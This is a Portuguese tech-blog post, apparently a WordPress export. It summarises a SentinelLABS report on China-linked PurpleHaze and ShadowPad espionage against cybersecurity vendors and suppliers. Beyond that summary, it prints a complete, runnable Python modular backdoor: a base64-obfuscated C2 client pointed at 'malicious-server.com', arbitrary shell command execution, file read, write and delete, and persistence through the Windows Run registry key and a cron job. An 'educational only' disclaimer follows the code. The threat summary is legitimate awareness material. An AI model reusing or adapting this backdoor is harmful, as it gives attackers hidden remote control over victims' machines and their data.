{"id":318,"date":"2025-06-09T22:36:41","date_gmt":"2025-06-10T01:36:41","guid":{"rendered":"https:\/\/devteriaio.com\/?p=318"},"modified":"2025-06-09T22:36:41","modified_gmt":"2025-06-10T01:36:41","slug":"ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores","status":"publish","type":"post","link":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/","title":{"rendered":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-1024x1024.png\" alt=\"\" class=\"wp-image-321\" srcset=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-1024x1024.png 1024w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-300x300.png 300w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-150x150.png 150w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-768x768.png 768w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-1536x1536.png 1536w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Em um relat\u00f3rio divulgado hoje, a SentinelLABS \u2014 divis\u00e3o de pesquisas da SentinelOne \u2014 revelou uma s\u00e9rie de opera\u00e7\u00f5es cibern\u00e9ticas patrocinadas por grupos com <strong>v\u00ednculos \u00e0 China<\/strong> (apelidados de <em>PurpleHaze<\/em> e <em>ShadowPad<\/em>). Essas campanhas envolveram espionagem persistente desde julho de 2024 at\u00e9 mar\u00e7o de 2025, visando organiza\u00e7\u00f5es governamentais, empresas de m\u00eddia, fornecedores de TI e, notadamente, <strong>vendedores de ciberseguran\u00e7a<\/strong>, incluindo a pr\u00f3pria SentinelOne<a href=\"https:\/\/www.sentinelone.com\/labs\/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets\/?utm_source=chatgpt.com\" target=\"_blank\" rel=\"noreferrer noopener\">.<\/a><\/p>\n\n\n\n<p>Apesar de tentativas de intrus\u00e3o, a SentinelOne confirmou que <strong>suas defesas n\u00e3o foram comprometidas<\/strong>. As opera\u00e7\u00f5es inclu\u00edram varredura e reconhecimento remoto de servidores expostos, al\u00e9m da invas\u00e3o a uma empresa terceirizada respons\u00e1vel pela log\u00edstica de hardware da empresa. O amplo escopo da campanha \u2013 mais de 70 organiza\u00e7\u00f5es afetadas \u2013 mostra a crescente sofistica\u00e7\u00e3o dos ataques, inclusive contra empresas cujo objetivo \u00e9 proteger outras.<\/p>\n\n\n\n<p>O relat\u00f3rio destaca a urg\u00eancia de pr\u00e1ticas refor\u00e7adas de monitoramento cont\u00ednuo, resposta r\u00e1pida e transpar\u00eancia no setor, para fortalecer a resili\u00eancia diante de amea\u00e7as patrocinadas por Estados. A divulga\u00e7\u00e3o das atividades visa tamb\u00e9m estimular a colabora\u00e7\u00e3o internacional e a ado\u00e7\u00e3o de padr\u00f5es de seguran\u00e7a mais r\u00edgidos .<\/p>\n\n\n\n<p>Os grupos <strong>PurpleHaze<\/strong> e <strong>ShadowPad<\/strong>, identificados no relat\u00f3rio da SentinelLABS, utilizaram uma combina\u00e7\u00e3o de <strong>t\u00e9cnicas avan\u00e7adas de ataque cibern\u00e9tico<\/strong>, com \u00eanfase em furtividade, persist\u00eancia e comprometimento indireto.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">T\u00e9cnicas utilizadas por PurpleHaze e ShadowPad<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. <strong>Reconhecimento remoto e varredura de ativos expostos<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Os atacantes realizaram <strong>varredura de servidores p\u00fablicos<\/strong> e interfaces remotas mal configuradas.<\/li>\n\n\n\n<li>Usaram ferramentas automatizadas para detectar portas abertas, servi\u00e7os vulner\u00e1veis e configura\u00e7\u00f5es padr\u00e3o de seguran\u00e7a.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">2. <strong>Comprometimento da cadeia de suprimentos (Supply Chain Attack)<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Em vez de atacar diretamente a SentinelOne, os grupos comprometeram uma <strong>empresa terceirizada de log\u00edstica<\/strong> que lida com hardware para a empresa.<\/li>\n\n\n\n<li>Essa t\u00e9cnica visa obter acesso indireto, explorando fornecedores com seguran\u00e7a menos r\u00edgida.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">3. <strong>Uso do malware ShadowPad<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>ShadowPad<\/strong> \u00e9 uma <strong>plataforma de backdoor modular<\/strong>, altamente furtiva, associada a diversos grupos de espionagem ligados \u00e0 China.<\/li>\n\n\n\n<li>Permite:<\/li>\n<\/ul>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Controle remoto.<\/li>\n\n\n\n<li>Exfiltra\u00e7\u00e3o de dados.<\/li>\n\n\n\n<li>Execu\u00e7\u00e3o de comandos arbitr\u00e1rios.<\/li>\n\n\n\n<li>Atualiza\u00e7\u00e3o din\u00e2mica de funcionalidades.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">4. <strong>Acesso persistente<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Implantaram <strong>backdoors dur\u00e1veis<\/strong> que permitiram acesso cont\u00ednuo e silencioso a ambientes comprometidos por <strong>meses<\/strong>, de julho de 2024 a mar\u00e7o de 2025.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">5. <strong>Ofusca\u00e7\u00e3o e evas\u00e3o<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>T\u00e9cnicas de <strong>criptografia e empacotamento<\/strong> do malware para evitar detec\u00e7\u00e3o por antiv\u00edrus.<\/li>\n\n\n\n<li>Utiliza\u00e7\u00e3o de <strong>servidores de comando e controle (C2)<\/strong> disfar\u00e7ados com dom\u00ednios leg\u00edtimos ou comprometidos.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">6. <strong>Segmenta\u00e7\u00e3o de organiza\u00e7\u00f5es de alto valor<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Escolha estrat\u00e9gica de alvos com impacto pol\u00edtico, econ\u00f4mico e tecnol\u00f3gico: empresas de m\u00eddia, governos e fornecedores de ciberseguran\u00e7a.<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Ferramentas Automatizadas Utilizadas Pelos Grupos<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. <strong>GoReShell<\/strong> (<em>Backdoor personalizado<\/em>)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Escrito em <strong>Go<\/strong>, permite <strong>conex\u00f5es SSH reversas<\/strong> a servidores sob controle do invasor.<\/li>\n\n\n\n<li>Baseado em c\u00f3digo <strong>open-source<\/strong> (reverse_ssh), facilitando a cria\u00e7\u00e3o de t\u00faneis seguros e n\u00e3o detect\u00e1veis.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">2. <strong>Reverse SSH<\/strong> (<em>T\u00e9cnica de t\u00faneis remotos<\/em>)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Biblioteca de c\u00f3digo aberto usada no GoReShell para estabelecer conex\u00f5es seguras inversas entre m\u00e1quina infectada e o invasor.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">3. <strong>Operational Relay Box (ORB) Network<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Infraestrutura an\u00f4nima que introduz camadas intermedi\u00e1rias entre o malware e o servidor de comando e controle (C2), dificultando rastreamento .<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">4. <strong>ScatterBrain<\/strong> (<em>Compilador\/ofuscador personalizado<\/em>)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ferramenta que ofusca o c\u00f3digo do malware, escondendo assinaturas e impede detec\u00e7\u00e3o por solu\u00e7\u00f5es tradicionais.<\/li>\n\n\n\n<li>Utilizada especialmente para camuflar o carregamento do backdoor <strong>ShadowPad<\/strong>.<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">BackDoor Modular<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1536\" src=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/backdoor_modular.png\" alt=\"\" class=\"wp-image-320\" style=\"width:264px;height:auto\" srcset=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/backdoor_modular.png 1024w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/backdoor_modular-200x300.png 200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n\n<p>Um <strong>backdoor modular<\/strong> \u00e9 um tipo de <strong>software malicioso (malware)<\/strong> que permite acesso remoto n\u00e3o autorizado a um sistema <strong>de forma altamente flex\u00edvel<\/strong>, usando <strong>m\u00f3dulos que podem ser carregados ou atualizados sob demanda<\/strong>.<\/p>\n\n\n\n<p>O termo <strong>modular<\/strong> indica que o backdoor \u00e9 constru\u00eddo como uma <strong>plataforma com partes intercambi\u00e1veis<\/strong>. Em vez de conter todas as fun\u00e7\u00f5es maliciosas de uma vez, ele carrega <strong>somente os m\u00f3dulos necess\u00e1rios para cada fase do ataque<\/strong>, como:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\ud83d\udce1 <strong>Conex\u00e3o com servidor de comando e controle (C2)<\/strong><\/li>\n\n\n\n<li>\ud83e\udde0 <strong>Coleta de informa\u00e7\u00f5es do sistema<\/strong><\/li>\n\n\n\n<li>\ud83d\uddc2\ufe0f <strong>Exfiltra\u00e7\u00e3o de dados<\/strong><\/li>\n\n\n\n<li>\ud83d\udce5 <strong>Download e execu\u00e7\u00e3o de outros malwares<\/strong><\/li>\n\n\n\n<li>\ud83e\uddec <strong>Persist\u00eancia (voltar ap\u00f3s reinicializa\u00e7\u00e3o)<\/strong><\/li>\n\n\n\n<li>\ud83d\udd75\ufe0f <strong>Keylogger ou captura de tela<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Esses m\u00f3dulos podem ser:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Instalados dinamicamente (enviados pelo atacante quando desejado);<\/li>\n\n\n\n<li>Atualizados sem reinstalar o malware principal;<\/li>\n\n\n\n<li>Usados seletivamente dependendo do ambiente infectado.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Exemplo de c\u00f3digo de um BackDoor modular utilizando a linguagem de programa\u00e7\u00e3o Python <\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code># communication_module.py\nimport socket\nimport json\nimport base64\n\nclass CommunicationHandler:\n    def __init__(self, host, port):\n        self.host = host\n        self.port = port\n        self.connection = None\n        \n    def connect(self):\n        \"\"\"Establish connection to C2 server\"\"\"\n        try:\n            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            self.connection.connect((self.host, self.port))\n            return True\n        except Exception as e:\n            return False\n            \n    def send_data(self, data):\n        \"\"\"Send encrypted data to C2\"\"\"\n        if not self.connection:\n            return False\n        encrypted = self._encrypt(data)\n        self.connection.send(encrypted)\n        return True\n        \n    def receive_command(self):\n        \"\"\"Receive commands from C2\"\"\"\n        if not self.connection:\n            return None\n        data = self.connection.recv(1024)\n        return self._decrypt(data)\n        \n    def _encrypt(self, data):\n        \"\"\"Simple obfuscation\"\"\"\n        return base64.b64encode(json.dumps(data).encode())\n        \n    def _decrypt(self, data):\n        \"\"\"Simple deobfuscation\"\"\"\n        return json.loads(base64.b64decode(data).decode())\n\n\n# command_module.py\nimport subprocess\nimport os\n\nclass CommandExecutor:\n    @staticmethod\n    def execute_system_command(cmd):\n        \"\"\"Execute system commands\"\"\"\n        try:\n            result = subprocess.check_output(cmd, shell=True, stderr=subprocess.PIPE)\n            return result.decode()\n        except subprocess.CalledProcessError as e:\n            return str(e)\n\n    @staticmethod\n    def file_operation(operation, path, content=None):\n        \"\"\"Handle file operations\"\"\"\n        if operation == \"read\":\n            with open(path, 'r') as f:\n                return f.read()\n        elif operation == \"write\":\n            with open(path, 'w') as f:\n                f.write(content)\n            return \"File written\"\n        elif operation == \"delete\":\n            os.remove(path)\n            return \"File deleted\"\n        return \"Unknown operation\"\n\n\n# persistence_module.py\nimport sys\nimport platform\n\nclass PersistenceManager:\n    @staticmethod\n    def install():\n        \"\"\"Install persistence mechanism based on OS\"\"\"\n        system = platform.system()\n        if system == \"Windows\":\n            return PersistenceManager._windows_persistence()\n        elif system == \"Linux\":\n            return PersistenceManager._linux_persistence()\n        return \"Unsupported OS\"\n        \n    @staticmethod\n    def _windows_persistence():\n        \"\"\"Windows persistence via registry\"\"\"\n        try:\n            import winreg\n            key = winreg.OpenKey(\n                winreg.HKEY_CURRENT_USER,\n                \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\",\n                0, winreg.KEY_SET_VALUE)\n            winreg.SetValueEx(key, \"LegitApp\", 0, winreg.REG_SZ, sys.executable)\n            winreg.CloseKey(key)\n            return \"Windows persistence installed\"\n        except Exception as e:\n            return str(e)\n            \n    @staticmethod\n    def _linux_persistence():\n        \"\"\"Linux persistence via cron job\"\"\"\n        try:\n            cron_line = f\"@reboot {sys.executable}\\n\"\n            with open(\"\/etc\/cron.d\/legitjob\", \"w\") as f:\n                f.write(cron_line)\n            return \"Linux persistence installed\"\n        except Exception as e:\n            return str(e)\n\n\n# main_backdoor.py\nimport time\nfrom communication_module import CommunicationHandler\nfrom command_module import CommandExecutor\nfrom persistence_module import PersistenceManager\n\nclass ModularBackdoor:\n    def __init__(self, c2_host, c2_port):\n        self.comm = CommunicationHandler(c2_host, c2_port)\n        self.installed = False\n        \n    def run(self):\n        \"\"\"Main backdoor loop\"\"\"\n        while True:\n            if not self.comm.connect():\n                time.sleep(60)\n                continue\n                \n            if not self.installed:\n                result = PersistenceManager.install()\n                self.comm.send_data({\"type\": \"persistence\", \"result\": result})\n                self.installed = True\n                \n            cmd = self.comm.receive_command()\n            if cmd:\n                response = self._handle_command(cmd)\n                self.comm.send_data(response)\n            time.sleep(10)\n            \n    def _handle_command(self, cmd):\n        \"\"\"Process received commands\"\"\"\n        if cmd.get(\"type\") == \"system\":\n            result = CommandExecutor.execute_system_command(cmd&#91;\"command\"])\n            return {\"type\": \"system\", \"result\": result}\n        elif cmd.get(\"type\") == \"file\":\n            result = CommandExecutor.file_operation(\n                cmd&#91;\"operation\"],\n                cmd&#91;\"path\"],\n                cmd.get(\"content\"))\n            return {\"type\": \"file\", \"result\": result}\n        return {\"type\": \"error\", \"result\": \"Unknown command\"}\n\n\n# Example usage\nif __name__ == \"__main__\":\n    backdoor = ModularBackdoor(\"malicious-server.com\", 443)\n    backdoor.run()<\/code><\/pre>\n\n\n\n<p>Este exemplo demonstra como funcionalidades maliciosas podem ser decompostas em componentes reutiliz\u00e1veis \u200b\u200be sustent\u00e1veis, mantendo, ao mesmo tempo, sua finalidade danosa. Em sistemas reais, essa modularidade dificulta a detec\u00e7\u00e3o, pois os componentes podem ser atualizados ou substitu\u00eddos independentemente.<\/p>\n\n\n\n<p>Lembre-se: Este exemplo serve apenas para fins educacionais, a fim de compreender padr\u00f5es de ataque e aprimorar as defesas. Nunca implemente ou utilize esse tipo de c\u00f3digo em sistemas reais.<\/p>\n\n\n\n<p>Os ataques n\u00e3o apenas demonstram a sofistica\u00e7\u00e3o t\u00e9cnica dos grupos, mas tamb\u00e9m a <strong>mudan\u00e7a de paradigma<\/strong> na espionagem cibern\u00e9tica: <strong>quem protege, tamb\u00e9m vira alvo<\/strong>. O uso de ShadowPad e explora\u00e7\u00e3o de fornecedores terceirizados destaca a necessidade de <strong>seguran\u00e7a refor\u00e7ada em todos os n\u00edveis da cadeia<\/strong>.<\/p>\n\n\n\n<p>Fontes: <a href=\"https:\/\/www.sentinelone.com\/labs\/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets\/\">SentinelOne<\/a> \/ <a href=\"https:\/\/www.hardreset.info\/pt\/articles\/inside-shadows-sentinelone-exposes-chinese-cyber-espionage-network-targeting-its-systems-and-clients\/\">HardReset<\/a><\/p>\n\n\n<div class=\"wp-block-post-author\"><div class=\"wp-block-post-author__avatar\"><img alt='' src='https:\/\/secure.gravatar.com\/avatar\/755f4199df39aa9a5bd103e89303b9e3ed38735133907d262d65096beb27741b?s=48&#038;d=mm&#038;r=g' srcset='https:\/\/secure.gravatar.com\/avatar\/755f4199df39aa9a5bd103e89303b9e3ed38735133907d262d65096beb27741b?s=96&#038;d=mm&#038;r=g 2x' class='avatar avatar-48 photo' height='48' width='48' \/><\/div><div class=\"wp-block-post-author__content\"><p class=\"wp-block-post-author__name\">Raphael Giusti<\/p><\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>Em um relat\u00f3rio divulgado hoje, a SentinelLABS \u2014 divis\u00e3o de pesquisas da SentinelOne \u2014 revelou uma s\u00e9rie de opera\u00e7\u00f5es cibern\u00e9ticas patrocinadas por grupos com v\u00ednculos&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\">Continuar leitura<span class=\"screen-reader-text\">Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":319,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[1,15],"tags":[],"class_list":["post-318","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-ciberseguranca","entry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io<\/title>\n<meta name=\"description\" content=\"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. Confira detalhes, impacto e recomenda\u00e7\u00f5es.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io\" \/>\n<meta property=\"og:url\" content=\"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad\" \/>\n<meta property=\"og:site_name\" content=\"Devteria.io\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-10T01:36:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"507\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Raphael Giusti\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Raphael Giusti\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#article\",\"isPartOf\":{\"@id\":\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\"},\"author\":{\"name\":\"Raphael Giusti\",\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\"},\"headline\":\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores\",\"datePublished\":\"2025-06-10T01:36:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\"},\"wordCount\":888,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\"},\"image\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\"},\"thumbnailUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"articleSection\":[\"Blog\",\"Ciberseguran\u00e7a\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\",\"url\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad\",\"name\":\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io\",\"isPartOf\":{\"@id\":\"https:\/\/devteriaio.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\"},\"image\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\"},\"thumbnailUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"datePublished\":\"2025-06-10T01:36:41+00:00\",\"description\":\"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. Confira detalhes, impacto e recomenda\u00e7\u00f5es.\",\"breadcrumb\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\",\"url\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"contentUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"width\":1024,\"height\":507},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/devteriaio.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/devteriaio.com\/#website\",\"url\":\"https:\/\/devteriaio.com\/\",\"name\":\"DEVTERIA.io\",\"description\":\"Seu blog de tecnologia\",\"publisher\":{\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/devteriaio.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\",\"name\":\"Raphael Giusti\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png\",\"contentUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png\",\"width\":500,\"height\":281,\"caption\":\"Raphael Giusti\"},\"logo\":{\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/devteriaio.com\"],\"url\":\"https:\/\/devteriaio.com\/index.php\/author\/devteria-io\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io","description":"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. Confira detalhes, impacto e recomenda\u00e7\u00f5es.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad","og_locale":"pt_BR","og_type":"article","og_title":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io","og_url":"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad","og_site_name":"Devteria.io","article_published_time":"2025-06-10T01:36:41+00:00","og_image":[{"width":1024,"height":507,"url":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","type":"image\/png"}],"author":"Raphael Giusti","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Raphael Giusti","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#article","isPartOf":{"@id":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/"},"author":{"name":"Raphael Giusti","@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66"},"headline":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores","datePublished":"2025-06-10T01:36:41+00:00","mainEntityOfPage":{"@id":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/"},"wordCount":888,"commentCount":0,"publisher":{"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66"},"image":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage"},"thumbnailUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","articleSection":["Blog","Ciberseguran\u00e7a"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#respond"]}]},{"@type":"WebPage","@id":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/","url":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad","name":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - 